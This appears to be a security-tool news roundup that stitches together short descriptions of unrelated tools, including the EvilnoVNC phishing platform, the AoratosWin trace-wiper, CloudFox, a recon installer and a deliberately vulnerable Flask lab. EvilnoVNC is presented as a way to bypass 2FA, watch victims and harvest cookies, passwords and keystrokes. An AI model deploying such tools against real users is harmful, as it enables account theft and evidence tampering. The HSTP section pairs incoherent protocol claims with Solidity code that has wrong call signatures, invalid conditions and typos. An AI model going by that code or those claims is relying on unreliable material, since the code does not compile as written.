Monkey365 is an Open Source security tool that can be used to easily conduct not only Microsoft 365, but also Azure subscriptions and Azure Active Directory security configuration reviews without the significant overhead of learning tool APIs or complex admin panels from the start. To help with this effort, Monkey365 also provides several ways to identify security gaps in the desired tenant setup and configuration. Monkey365 provides valuable recommendations on how to best configure those settings to get the most out of your Microsoft 365 tenant or Azure subscription.


Introduction

Monkey365 is a plugin-based PowerShell module that can be used to review the security posture of your cloud environment. With Monkey365 you can scan for potential misconfigurations and security issues in public cloud accounts according to security best practices and compliance standards, across Azure, Azure AD, and Microsoft365 core applications.

Installation

You can either download the latest zip by clicking this link or download Monkey365 by cloning the repository:

Once downloaded, you must extract the file and extract the files to a suitable directory. Once you have unzipped the zip file, you can use the PowerShell V3 Unblock-File cmdlet to unblock files:

Get-ChildItem -Recurse c:\monkey365 | Unblock-File

Once you have installed the monkey365 module on your system, you will likely want to import the module with the Import-Module cmdlet. Assuming that Monkey365 is located in the PSModulePath, PowerShell would load monkey365 into active memory:

Import-Module monkey365

If Monkey365 is not located on a PSModulePath path, you can use an explicit path to import:

Import-Module C:\temp\monkey365

You can also use the Force parameter in case you want to reimport the Monkey365 module into the same session

Import-Module C:\temp\monkey365 -Force

Basic Usage

The following command will provide the list of available command line options:

Get-Help Invoke-Monkey365

To get a list of examples use:

Get-Help Invoke-Monkey365 -Examples

To get a list of all options and examples with detailed info use:

Get-Help Invoke-Monkey365 -Detailed

The following example will retrieve data and metadata from Azure AD and SharePoint Online and then print results. If credentials are not supplied, Monkey365 will prompt for credentials.

$param = @{
Instance = 'Microsoft365';
Analysis = 'SharePointOnline';
PromptBehavior = 'SelectAccount';
IncludeAzureActiveDirectory = $true;
ExportTo = 'PRINT';
}
$assets = Invoke-Monkey365 @param

Regulatory compliance checks

Monkey365 helps streamline the process of performing not only Microsoft 365, but also Azure subscriptions and Azure Active Directory Security Reviews.

160+ checks covering industry defined security best practices for Microsoft 365, Azure and Azure Active Directory.

Monkey365 will help consultants to assess cloud environment and to analyze the risk factors according to controls and best practices. The report will contain structured data for quick checking and verification of the results.

Supported standards

By default, the HTML report shows you the CIS (Center for Internet Security) Benchmark. The CIS Benchmarks for Azure and Microsoft 365 are guidelines for security and compliance best practices.

The following standards are supported by Monkey365:

  • CIS Microsoft Azure Foundations Benchmark v1.4.0
  • CIS Microsoft 365 Foundations Benchmark v1.4.0

More standards will be added in next releases (NIST, HIPAA, GDPR, PCI-DSS, etc..) as they are available.

Additional information such as Installation or advanced usage can be found in the following link



American Fuzzy Lop plus plus 4.04c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

OpenSSL Toolkit 3.0.6

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide. The 3.x series is the current major version of OpenSSL.

OpenSSL Toolkit 1.1.1r

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide.

HSTP - Simple Hyper Service Transfer Protocol On Networks



The protocol aims to develop a application layer abstraction for the Hyper Service Transfer Protocol.

HSTP is a recursion as nature of HSTP. This protocol implements itself as a interface. On every internet connected device, there is a HSTP instance. That's why the adoption is not needed. HSTP already running top of the internet. We have just now achieved to explain the protocol over protocols on heterogeneous networks. That's why do not compare with web2, web3 or vice versa.

Abstract

HSTP is a application representation interface for heterogeneous networks.

HSTP interface enforces to implement a set of methods to be able to communicate with other nodes in the network. Thus serves, clients, and other nodes can communicate with each other with trust based, end to end encrypted way. By the time the node resolution is based on fastest path resolution algorithm I wrote.


Protocol 4 Babies

Story time!

  • Baby crying!
    ๏‘ถ
  • Needs milk!
    ๏ผ
  • Mommy has a problem.
  • Father has a problem.
  • Let's fix this!

A small overview

Think about, we're in the situation of one mother and one father lives a happy life. They had a baby! Suddenly, the mother needed to drink pills regularly to cure a disase. The pill is a poison for the baby. The baby is crying and the mother calls father because he is the only trusted person to help the baby. But the father sometime can not stay at home, he needs to do something to feed the baby. Father heard one milkman has fresh and high quality milks for low price. Father decides to try to talk the milkman, milkman deliver the milk to the father, father carry the milk to the mother. Mother give the milk to the baby. Baby is happy now and the baby sleeps, mother see the baby is happy.

The family never buy the milk from outside, this is the first time they buy milk for the baby: (Mom do not know the number of milkman, milkman do not know the home address)

As steps:

0) - Baby wants to drink milk.
1) - Baby cries to the mom.
3) - Mom see the baby is crying.
4) - Mom checks the fridge. Mom sees the milk is empty. (Mother is only trusting the Father)
5) - Mom calls the father.
6) - Father calls the milkman.
7) - Milkman delivers the milk to father.
8) - Father delivers the milk to mom.
9) - Mom gives the milk to the baby.
10) - Baby drinks the milk.
11) - Baby is happy.
12) - Baby sleeps.
13) - Mother see the baby is happy and sleeps.
14) - In order to be able to contact the milkman again, the mother asks the father to tell her that she wants the milkman to save the address of the house and the mobile phone of the mother.
15) - Mother calls the father.
16) - Father calls the milkman.
17) - Milkman saves the address of the house and the mobile phone of the mother.

Oops, tomorrow baby wakes up and cries again,
0) - Baby wants to drink milk.
1) - Baby cries to the mom.
2) - Mom see the baby is crying.
3) - Mom checks the fridge. Mom sees the milk is empty. (Mother is trusting the Father had right decision in the first place by giving the address to the milkman, and the milkman had right decision in the first place by saving the address of the house and the mobile phone of the mother.)
4) - Mother calls the milkman (Mother is trusting the Father's decision only)
5) - Milkman delivers the milk to mom.
6) - Mom gives the milk to the baby.
7) - Baby drinks the milk.
8) - Baby is happy.
9) - Baby sleeps.
10) - Mother see the baby is happy and sleeps.
11) - Mother is happy and the mother trust the milkman now.

this document you're reading is a manifest for the internet people to connecting the other people by trusting the service serve the client and the trust only can be maintainable by providing good services. trust is the key, but not enough for survive. the service has to be reliable, consistent, cheap. unless the people will decide to not ask from you again.

So, it's easy right? It's so simple to understand, who are those people in the story?

  • Baby is a client.
  • Mom is a client.
  • Father is a client.
  • Milkman is a server.

also,

  • Baby could be a server in [TIME].
  • Mom is a server for baby.
  • Father is a server for mom.
  • Milkman is a server for father.
  • Milkman is a server for mom.

Baby is in trusted hands. Nothing to worry about. They love you, you will understand when you grow up and have a child.

// Technical step explanation soon, but not that hard as you see.

What is a HSTP?

HSTP is a interface, which is a set of methods that must be implemented by the application layer. The interface is used to communicate with other nodes in the network. The interface is designed to be used in a heterogeneous network.

What is a HSTP node?

HSTP shall be implemented on any layer of network connected devices/environment.

HSTP node could be a TCP server, HTTP server, static file or contract in any chain. One HSTP node is able to call any other HSTP node. Thus the nodes can call each other freely, they can check their system status, and they can communicate with each other.

What kind of abstraction layer for networks?

HSTP is already implemented on language level, by people for people. English is mostly adopted language around the Earth. JavaScript could be known also mostly adopted language for browser environments. Solidity is for EVM-based chains, hyperbees for TCP based networks, etc.

HSTP interface shall be applied between any HSTP connected devices/networks.

  • [Universe] talks to [Universe] via [HSTP]
    • [Kind] universe talks over world.
      • [World] Earth talks with sound frequencies and HSTP.
        • [Country] X sound frequencies on Xish and HSTP.
          • [Community] CommunityX Xish on CommunityXish.
        • [Country] Y talks Yish and HSTP.
        • [Country] Z talks Zish and HSTP.
      • [World] Mars talks with radio frequencies.
        • [Bacteria] UUU-1 talks UUU-1ish and HSTP.
          • Info: UUU-1 can call, universe/kind/world/Earth/X/CommunityX/query
      • [World] Jupiter talks with light frequencies and do not implements HSTP.
        • Info: If the Earth wants to talk with Jupiter, we can add one HSTP to Jupiter proxy on universe.
    • [Kind] universe talks over atoms and HSTP.
      • [Atoms] ... and HSTP.
        • ... and HSTP.
          • [Y] ... and HSTP.
            • Info: [Y] can talk with universe/kind/world/Mars/Bacteria/UUU-1/query
      • [Atoms] ... and HSTP.
        • ... and HSTP.
          • [Y] ... and HSTP.
            • Info: [Y] can talk with universe/kind/world/Mars/Bacteria/UUU-1/query Info: Kind universe can talk with Mars, and Mars also can talk with Kind universe.

What is the purpose of HSTP?

Infinitive scaling options: Any TCP connected device can talk with any other TCP connected device over HSTP. That means any web browser is serve of another HSTP node, and any web browser can call any other web browser.

Uniform application representation interface: HSTP is a uniform interface, which is a set of methods that must be implemented by the application layer.

Heterogeneous networks: Any participant of network is allowing to share the resources with other participants of the network. The resources can be CPU, memory, storage, network, etc.

Conjucation of web versions Since the blockchain technologies calling as web3, people started discussing about the differanciates between the web's. Comparing is a behaviour for incremental numeric system education's mindset. Which one is better: none of them. We have to build systems could talk in one uniform protocol, underneath services could be anything. HSTP is aiming for that.

What are the components of HSTP?

Registry interface Registry interface designed for using on TCP layer, to be able to register top level tld nodes in the network. The first implementation of HSTP TCP relay will resolve hstp/

The registry has two parts of the interface:

  • Register method, which is used to register a new node in the network.
  • Resolve method, which is used to resolve a node in the network.

Registry implementation needs two HSTP node,

  1. Hyperbees
  • Heterogen networks will resolve the registry of RPC, TCP, HTTP, HSTP etc.
  1. Registry.sol on any EVM based chain. (Ethereum, Binance Smart Chain, Polygon, etc.)
  • Registry.sol will resolve the registry of HSTP nodes. That can be relayed over another networks.

Router interface

For demonstration purposes, we will use the following solidity example:

// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;

import "./HSTP.sol";
import "./ERC165.sol";

enum Operation {
Query,
Mutation
}

struct Response {
uint256 status;
string body;
}

struct Registry {
HSTP resolver;
}

// HSTP/Router.sol
abstract contract Router is ERC165 {
event Log(address indexed sender, Operation operation, bytes payload);
event Register(address indexed sender, Registry registry);
mapping(string => Registry) public routes;

function reply(string memory name, Operation _operation, bytes memory payload) public virtual payable returns(Response memory response) {
emit Log(msg.sender, _operation, payload);
// Traverse upwards and downwards of the tree.
// Tries to find the closest path for given operation.
// If the route is registered on HSTP node, reply from children node.
// If the node do not have the route on this node, ask for parent.
if (routes[name]) {
if (_operation == Operation.Query) {
return this.query(payload);
} else if (_operation == Operation.Mutation) {
return this.mutation(payload);
}
}
return super.reply(name, _operation, payload);
}

function query(string memory name, bytes memory payload) public view returns (Response memory) {
return routes[name].resolver.query(payload);
}

function mutation(string memory name, bytes memory payload) public payable returns (Response memory) {
return routes[name].resolver.mutation(payload);
}

function register(string memory name, HSTP node) public {
Registry memory registry = Registry({
resolver: node
});
emit Register(msg.sender, registry);
routes[name] = registry;
}

function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
return interfaceId == type(HSTP).interfaceId;
}
}

HSTP interface

// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;

import "./Router.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
// Will implement: EIP-4337 when it's on final stage.
// https://github.com/ethereum/EIPs/blob/master/EIPS/eip-4337.md
abstract contract HSTP is Router {
constructor(string memory name) {
register(name, this);
}

function query(bytes memory payload)
public
view
virtual
returns (Response memory);

function mutation(bytes memory payload)
public
payable
virtual
returns (Response memory);
}

Example HSTP Node

HSTP node has access to call parent router by super.reply(name, operation, payload) method. HSTP node can also call children nodes by calling this.query(payload) or this.mutation(payload) methods.

A HSTP node can be a smart contract, or a web browser, or a TCP connected device.

Node has full capability of adding more HSTP nodes to the network or itself as sub services.

      HSTP  HSTP
/ \ / \
HSTP HSTP HSTP
/ \
HSTP HSTP
/ /
HSTP HSTP
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

import "hstp/HSTP.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {

struct ITodo {
string todo;
}

function addTodo(ITodo memory request) public payable returns(Response memory response) {
response.body = request.todo;
return response;
}

// Override for HSTP.
function query(bytes memory payload)
public
view
virtual
override
returns (Response memory) {}

function mutation(bytes memory payload)
public
payable
virtual
override
returns (Response memory) {
(ITodo memory request) = abi.decode(payload, (ITodo));
return this.addTodo(request);
}
}</ code>

Proposal

Ethereum proposal is draft now, but the protocol has referance implementation Todo.sol.

Awesome web services running top of HSTP

Full list here

Hello world

You can test the HSTP and try on remix now.

How to play with the protocol?

  • Copy the source code below to the https://remix.ethereum.org/
  • Deploy on any EVM based chain.
  • Call the functions and try different network topologies on HSTP.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

import "hstp/HSTP.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {

struct TodoRequest {
string todo;
}

function addTodo(TodoRequest memory request) public payable returns(Response memory response) {
response.body = request.todo;
return response;
}

// Override for HSTP.
function query(bytes memory payload)
public
view
virtual
override
returns (Response memory) {}

function mutation(bytes memory payload)
public
payable
virtual
override
returns (Response memory) {
(TodoRequest memory todoRequest) = abi.decode(payload, (TodoRequest));
return this.addTodo(tod oRequest);
}
}

Contribute:

Developer level contribution

  • Write a todo application with HSTP, deploy with remix and test it.
  • Draw example architecture of HSTP (serviceless architecture).

Core level contribution

  • Implement TCP layer HSTP interface on hyperbees, [Universe]
    • hyperbees and HSTP will be the first implementation of HSTP.
    • That will covers the universe phrase of networks. That will bring us full decentralized web on HSTP.
  • Implement RPC layer HSTP interface on Solidity [Web3]
  • Implement complex serviceless architecture on HSTP interface with Solidity [Web3]
  • Implement HTTP layer HSTP interface on JavaScript [Web]

Inspirations:

License

GNU GENERAL PUBLIC LICENSE V3

Core Contributors

Author

Cagatay Cali



EvilnoVNC - Ready To Go Phishing Platform


EvilnoVNC is a Ready to go Phishing Platform.

Unlike other phishing techniques, EvilnoVNC allows 2FA bypassing by using a real browser over a noVNC connection.

In addition, this tool allows us to see in real time all of the victim's actions, access to their downloaded files and the entire browser profile, including cookies, saved passwords, browsing history and much more.


Requirements

  • Docker
  • Chromium

Download

It's recommended to clone the complete repository or download the zip file.
Additionally, it's necessary to build Docker manually. You can do this by running the following commands:

git clone https://github.com/JoelGMSec/EvilnoVNC
cd EvilnoVNC ; sudo chown -R 103 Downloads
sudo docker build -t joelgmsec/evilnovnc .

Usage

./start.sh -h

_____ _ _ __ ___ _ ____
| ____|_ _(_) |_ __ __\ \ / / \ | |/ ___|
| _| \ \ / / | | '_ \ / _ \ \ / /| \| | |
| |___ \ V /| | | | | | (_) \ V / | |\ | |___
|_____| \_/ |_|_|_| |_|\___/ \_/ |_| \_|\____|

---------------- by @JoelGMSec --------------

Usage: ./start.sh $resolution $url

Examples:
1280x720 16bits: ./start.sh 1280x720x16 http://example.com
1280x720 24bits: ./start.sh 1280x720x24 http://example.com
1920x1080 16bits: ./start.sh 1920x1080x16 http://example.com
1920x1080 24bits: ./start.sh 1920x1080x24 http://example.com

The detailed guide of use can be found at the following link:

https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc

Features & To Do

  • Export Evil-Chromium profile to host
  • Save download files on host
  • Disable parameters in URL (like password)
  • Disable key combinations (like Alt+1 or Ctrl+S)
  • Disable access to Thunar
  • Decrypt cookies in real time
  • Expand cookie life to 99999999999999999
  • Dynamic title from original website
  • Dynamic resolution from preload page
  • Replicate real user-agent and other stuff
  • Basic keylogger

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

Original idea by @mrd0x: https://mrd0x.com/bypass-2fa-using-novnc
This tool has been created and designed from scratch by Joel Gรกmez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



cryptmount Filesystem Manager 6.1.0

cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.

AoratosWin - A Tool That Removes Traces Of Executed Applications On Windows OS

AoratosWin is a tool that removes traces of executed applications on Windows OS which can easily be listed with tools such as ExecutedProgramList by Nirsoft.

(Feel free to decompile, reverse, redistribute, etc.)


Supported OS (Tested On)

  • Windows 7 (x86, x64)
  • Windows 8 (x86, x64)
  • Windows 8.1 (x86, x64)
  • Windows 10 (x86, x64)
  • Windows 11 (x64)

Minimum System Reqs:

  • .NET Framework 4.0

Disclaimer

Any actions and/or activities related to this tool is solely your responsibility.



Cloudfox - Automating Situational Awareness For Cloud Penetration Tests


CloudFox helps you gain situational awareness in unfamiliar cloud environments. Itโ€™s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

CloudFox helps you answer the following common questions (and many more):

  • What regions is this AWS account using and roughly how many resources are in the account?
  • What secrets are lurking in EC2 userdata or service specific environment variables?
  • What actions/permissions does this [principal] have?
  • What roles trusts are overly permissive or allow cross-account assumption?
  • What endpoints/hostnames/IPs can I attack from an external starting point (public internet)?
  • What endpoints/hostnames/IPs can I attack from an internal starting point (assumed breach within the VPC)?
  • What filesystems can I potentially mount from a compromised resource inside the VPC?

Quick Start

CloudFox is modular (you can run one command at a time), but there is an aws all-checks command that will run the other aws commands for you with sane defaults:

cloudfox aws --profile [profile-name] all-checks

CloudFox is designed to be executed by a principal with limited read-only permissions, but it's purpose is to help you find attack paths that can be exploited in simulated compromise scenarios (aka, objective based penetration testing).

For the full documentation please refer to our wiki.

Supported Cloud Providers

Provider CloudFox Commands
AWS 15
Azure 2 (alpha)
GCP Support Planned
Kubernetes Support Planned

Install

Option 1: Download the latest binary release for your platform.

Option 2: Install Go, clone the CloudFox repository and compile from source

# git clone https://github.com/BishopFox/cloudfox.git
...omitted for brevity...
# cd ./cloudfox
# go build .
# ./cloudfox

Prerequisites

AWS

  • AWS CLI installed
  • Supports AWS profiles, AWS environment variables, or metadata retrieval (on an ec2 instance)
  • A principal with one recommended policies attached (described below)
  • Recommended attached policies: SecurityAudit + CloudFox custom policy

Additional policy notes (as of 09/2022):

Policy Notes
CloudFox custom policy Has a complete list of every permission cloudfox uses and nothing else
arn:aws:iam::aws:policy/SecurityAudit Covers most cloudfox checks but is missing newer services or permissions like apprunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess Covers most cloudfox checks but is missing newer services or permissions like AppRunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices - and is also missing iam:SimulatePrincipalPolicy.
arn:aws:iam::aws:policy/ReadOnlyAccess Only missing AppRunner, but also grants things like "s3:Get*" which can be overly permissive.
arn:aws:iam::aws:policy/AdministratorAccess This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :)

Azure

  • Viewer or similar permissions applied.

Supported Commands

Provider Command Name Description
AWS all-checks Run all of the other commands using reasonable defaults. You'll still want to check out the non-default options of each command, but this is a great place to start.
AWS access-keys Lists active access keys for all users. Useful for cross referencing a key you found with which in-scope account it belongs to.
AWS buckets Lists the buckets in the account and gives you handy commands for inspecting them further.
AWS ecr List the most recently pushed image URI from all repositories. Use the loot file to pull selected images down with docker/nerdctl for inspection.
AWS endpoints Enumerates endpoints from various services. Scan these endpoints from both an internal and external position to look for things that don't require authentication, are misconfigured, etc.
AWS env-vars Grabs the environment variables from services that have them (App Runner, ECS, Lambda, Lightsail containers, Sagemaker are supported. If you find a sensitive secret, use cloudfox iam-simulator AND pmapper to see who has access to them.
AWS filesystems Enumerate the EFS and FSx filesystems that you might be able to mount without creds (if you have the right network access). For example, this is useful when you have ec:RunInstance but not iam:PassRole.
AWS iam-simulator Like pmapper, but uses the IAM policy simulator. It uses AWS's evaluation logic, but notably, it doesn't consider transitive access via privesc, which is why you should also always also use pmapper.
AWS instances Enumerates useful information for EC2 Instances in all regions like name, public/private IPs, and instance profiles. Generates loot files you can feed to nmap and other tools for service enumeration.
AWS inventory Gain a rough understanding of size of the account and preferred regions.
AWS outbound-assumed-roles List the roles that have been assumed by principals in this account. This is an excellent way to find outbound attack paths that lead into other accounts.
AWS permissions Enumerates IAM permissions associated with all users and roles. Grep this output to figure out what permissions a particular principal has rather than logging into the AWS console and painstakingly expanding each policy attached to the principal you are investigating.
AWS principals Enumerates IAM users and Roles so you have the data at your fingertips.
AWS role-trusts Enumerates IAM role trust policies so you can look for overly permissive role trusts or find roles that trust a specific service.
AWS route53 Enumerate all records from all route53 managed zones. Use this for application and service enumeration.
AWS secrets List secrets from SecretsManager and SSM. Look for interesting secrets in the list and then see who has access to them using use cloudfox iam-simulator and/or pmapper.
Azure instances-map Enumerates useful information for Compute instances in all available resource groups and subscriptions
Azure rbac-map Enumerates Role Assignments for all tenants

Authors

Contributing

Wiki - How to Contribute

TODO

  • AWS - Add support for GovCloud and China regions
  • AWS - Add support for hardcoded region (which would override the default of looking in every region)

FAQ

How does CloudFox compare with ScoutSuite, Prowler, Steampipe's AWS Compliance Module, AWS Security Hub, etc.

CloudFox doesn't create any alerts or findings, and doesn't check your environment for compliance to a baseline or benchmark. Instead, it simply enables you to be more efficient during your manual penetration testing activities. If gives you the information you'll likely need to validate whether an attack path is possible or not.

Why do I see errors in some CloudFox commands?

  • Services that don't exist in all regions - CloudFox currently makes the same API calls to every region. However, not all regions support all services. For instance, services like Appstream and AWS Grafana are only supported in a subset of the total regions. In the future, we plan to make CloudFox aware of which services run in each region.
  • You don't have permission - Another reason you might see errors if you don't have permissions to make calls that CloudFox is making. Either because the policy doesn't allow it (e.g., SecurityAudit doesn't allow all of the permissions CloudFox needs. Or, it might be an SCP that is blocking you.

You can always look in the ~/.cloudfox/cloudfox-error.log file to get more information on errors.

Prior work and other related projects

  • SmogCloud - Inspiration for the endpoints command
  • SummitRoute's AWS Exposable Resources - Inspiration for the endpoints command
  • Steampipe - We used steampipe to prototype many cloudfox commands. While CloudFox is laser focused on helping cloud penetration testers, steampipe is an easy way to query any and all of your cloud resources.
  • Principal Mapper - Inspiration for, and a strongly recommended partner to the iam-simulator command
  • Cloudsplaining - Inspiration for the permissions command
  • ScoutSuite - Excellent cloud security benchmark tool. Provided inspiration for the --userdata functionality in the instances command, the permissions command, and many others
  • Prowler - Another excellent cloud security benchmark tool.
  • Pacu - Excellent cloud penetration testing tool. PACU has quite a few enumeration commands similar to CloudFox, and lots of other commands that automate exploitation tasks (something that CloudFox avoids by design)
  • CloudMapper - Inspiration for the inventory command and just generally CloudFox as a whole


Parrot 5.1 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot OS 5.1 is officially released. We're proud to say that the new version of Parrot OS 5.1 is available for download; this new version includes a lot of improvements and updates that makes the distribution more performing and more secure.

How do I get Parrot OS?

You can download Parrot OS by clicking here and, as always, we invite you to never trust third part and unofficial sources.

If you need any help or in case the direct downloads don't work for you, we also provide official Torrent files, which can circumvent firewalls and network restrictions in most cases.

How do I upgrade from a previous version?

First of all, we always suggest to update your version for being sure that is stable and functional. You can upgrade an existing system via APT using one of the following commands:

  • sudo parrot-upgrade

or

  • sudo apt update && sudo apt full-upgrade

Even if we recommend to always update your version, it is also recommended to do a backup and re-install the latest version to have a cleaner and more reliable user experience, especially if you upgrade from a very old version of parrot.

What's new in Parrot OS 5.1

New kernel 5.18.

You can find all the infos about the new Kernel 5.18 by clickig on this link.

Updated docker containers

Our docker offering has been revamped! We now provide our dedicated parrot.run image registry along with the default docker.io one.

All our images are now natively multiarch, and support amd64 and arm64 architectures.

Our containers offering was updated as well, and we are committed to further improve it.

Run docker run --rm -ti --network host -v $PWD/work:/work parrot.run/core and give our containers a try without having to install the system, or visit our Docker images page to explore the other containers we offer.

Updated backports.

Several packages were updated and backported, like the new Golang 1.19 or Libreoffice 7.4. This is part of our commitment to provide the latest version of every most important software while choosing a stable LTS release model.

To make sure to have all the latest packages installed from our backports channel, use the following commands:

  • sudo apt update
  • sudo apt full-upgrade -t parrot-backports

System updates

The system has received important updates to some opf its key packages, like parrot-menu, which now provides additional launchers to our newly imported tools; or parrot-core, which now provides a new firefox profile with improved security hardening, plus some minor bugfixes to our zshrc configuration.

Firefox profile overhault

As mentioned earlier, our Firefox profile has received a major update that significantly improves the overall privacy and security.

Our bookmarks collection has been revamped, and now includes new resources, including OSINT services, new learning sources and other useful resources for hackers, developers, students and security researchers.

We have also boosted our effort to avoid Mozilla telemetry and bring DuckDuckGo back as the default search engine, while we are exploring other alternatives for the future.

Tools updates

Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.

Important updates involved metasploit, exploitdb and other popular tools as well.

New AnonSurf 4.0

The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.

Anonsurf is our in-house anonymity solution that routes all the system traffic through TOR automatically without having to set up proxy settings for each individua program, and preventing traffic leaking in most cases.

The new version provides significant fixes and reliability updates, fully supports debian systems without the old resolvconf setup, has a new user interface with improved system tray icon and settings dialog window, and offers a better overall user experience.

Parrot IoT improvements

Our IoT version now implements significant performance improvements for the various Raspberry Pi boards, and finally includes Wi-Fi support for the Raspberry Pi 400 board.

The Parrot IoT offering has also been expanded, and it now offers Home and Security editions as well, with a full MATE desktop environment exactly like the desktop counterpart.

Architect Edition improvements

Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.

The Architect Edition is a special edition of Parrot that enables the user to install a barebone Parrot Core system, and then offers a selection of additional modules to further customize the system.

You can use Parrot Architect to install other desktop environments like KDE, GNOME or XFCE, or to install a specific selection of tools.

New infrastructure powered by Parrot and Kubernetes

The Architect Edition is also used internally by the Parrot Engineering Team to install Parrot Server Edition on all the servers that power our infrastructure, which is officially 100% powered by Parrot and Kubernetes.

This is a major change in the way we handle our infrastructure, which enables us to implement better autoscaling, easier management, smaller attack surface and an overall better network, with the improved scalability and security we were looking for.



Arsenal - Recon Tool installer



Arsenal is a Simple shell script (Bash) used to install the most important tools and requirements for your environment and save time in installing all these tools.


Tools in Arsenal

Name description
Amass The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques
ffuf A fast web fuzzer written in Go
dnsX Fast and multi-purpose DNS toolkit allow to run multiple DNS queries
meg meg is a tool for fetching lots of URLs but still being 'nice' to servers
gf A wrapper around grep to avoid typing common patterns
XnLinkFinder This is a tool used to discover endpoints crawling a target
httpX httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads
Gobuster Gobuster is a tool used to brute-force (DNS,Open Amazon S3 buckets,Web Content)
Nuclei Nuclei tool is Golang Language-based tool used to send requests across multiple targets based on nuclei templates leading to zero false positive or irrelevant results and provides fast scanning on various host
Subfinder Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well
Naabu Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT scans on the host/list of hosts and lists all ports that return a reply
assetfinder Find domains and subdomains potentially related to a given domain
httprobe Take a list of domains and probe for working http and https servers
knockpy Knockpy is a python3 tool designed to quickly enumerate subdomains on a target domain through dictionary attack
waybackurl fetch known URLs from the Wayback Machine for *.domain and output them on stdout
Logsensor A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning
Subzy Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Xss-strike Advanced XSS Detection Suite
Altdns Subdomain discovery through alterations and permutations
Nosqlmap NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases and web applications using NoSQL in order to disclose or clone data from the database
ParamSpider Parameter miner for humans
GoSpider GoSpider - Fast web spider written in Go
eyewitness EyeWitness is a Python tool written by @CptJesus and @christruncer. Itโ€™s goal is to help you efficiently assess what assets of your target to look into first.
CRLFuzz A fast tool to scan CRLF vulnerability written in Go
DontGO403 dontgo403 is a tool to bypass 40X errors
Chameleon Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies
uncover uncover is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools
wpscan WordPress Security Scanner

Requirements in Arsenal

  • Python3
  • Git
  • Ruby
  • Wget
  • GO-Lang
  • Rust:fast:

Go-lang installation

 sudo apt-get remove -y golang-go
sudo rm -rf /usr/local/go
wget https://go.dev/dl/go1.19.1.linux-amd64.tar.gz
sudo tar -xvf go1.19.1.linux-amd64.tar.gz
sudo mv go /usr/local
nano /etc/profile or .profile
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$GOPATH/bin
source /etc/profile #to update you shell dont worry

How to install

git clone https://github.com/Micro0x00/Arsenal.git
cd Arsenal
sudo chmod +x Arsenal.sh
sudo ./Arsenal.sh




Wireshark Analyzer 4.0.0

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

Erlik 2 - Vulnerable-Flask-App


Erlik 2 - Vulnerable-Flask-App

Tested - Kali 2022.1

Description

It is a vulnerable Flask Web App. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • HTML Injection
  • XSS
  • SSTI
  • SQL Injection
  • Information Disclosure
  • Command Injection
  • Brute Force
  • Deserialization
  • Broken Authentication
  • DOS
  • File Upload

Installation

git clone https://github.com/anil-yelken/Vulnerable-Flask-App

cd Vulnerable-Flask-App

sudo pip3 install -r requirements.txt

Usage

python3 vulnerable-flask-app.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Utkuici - Nessus Automation


